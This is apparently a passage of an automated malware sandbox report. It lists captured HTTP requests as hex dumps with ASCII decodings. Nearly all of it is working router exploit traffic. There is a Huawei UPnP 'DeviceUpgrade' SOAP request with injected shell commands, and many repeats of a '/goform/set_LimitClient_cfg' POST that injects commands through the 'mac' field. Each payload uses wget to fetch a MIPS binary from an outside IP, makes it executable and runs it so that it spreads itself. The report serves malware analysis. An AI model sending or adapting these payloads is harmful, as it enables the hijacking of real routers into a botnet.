6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
